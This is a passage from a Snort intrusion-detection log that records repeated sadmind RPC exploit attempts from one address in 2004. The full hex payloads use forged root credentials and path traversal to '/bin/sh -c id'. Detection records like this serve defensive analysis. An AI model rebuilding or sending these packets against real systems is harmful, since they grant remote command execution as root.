320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33324) [2004-06-21 12:33:50] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16185 flags=0 offset=0 TTL=49 chksum=13840
UDP: port=60738 -> dport: 32774 len=1456
Payload: length = 1448
000 : D4 FB 8C 18 00 00 00 00 00 00 00 02 00 01 87 88 ................
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 97 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 9B 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33325) [2004-06-21 12:33:54] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16594 flags=0 offset=0 TTL=49 chksum=13431
UDP: port=60738 -> dport: 32775 len=1456
Payload: length = 1448
000 : CA B9 9F 0F 00 00 00 00 00 00 00 02 00 01 87 88 ................
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33326) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16622 flags=0 offset=0 TTL=49 chksum=13403
UDP: port=60738 -> dport: 32776 len=1456
Payload: length = 1448
000 : D4 4B 93 A1 00 00 00 00 00 00 00 02 00 01 87 88 .K..............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33327) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16640 flags=0 offset=0 TTL=49 chksum=13385
UDP: port=60738 -> dport: 32777 len=1456
Payload: length = 1448
000 : FB 12 4F C0 00 00 00 00 00 00 00 02 00 01 87 88 ..O.............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
